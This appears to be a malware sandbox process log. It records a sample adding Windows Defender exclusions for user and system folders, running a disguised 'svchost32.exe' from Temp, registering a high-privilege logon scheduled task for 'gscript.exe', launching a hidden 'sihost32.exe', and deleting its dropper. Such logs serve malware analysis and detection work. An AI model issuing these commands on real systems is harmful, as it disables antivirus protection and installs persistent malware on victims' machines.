cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2228powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
1536powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2976powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
2724powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
1204cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\gscript.exe"
2692svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\gscript.exe"
2288cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"' & exit
2480schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"'
1316cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2120powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2908powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2824powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1916cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\gscript.exe"
2760svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\gscript.exe"
2064cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"' & exit
736schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "gscript" /tr '"C:\Windows\system32\gscript.exe"'
2600sihost32.exe "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
2756cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
2140choice.exe choice /C Y /N /D Y /T 3
2772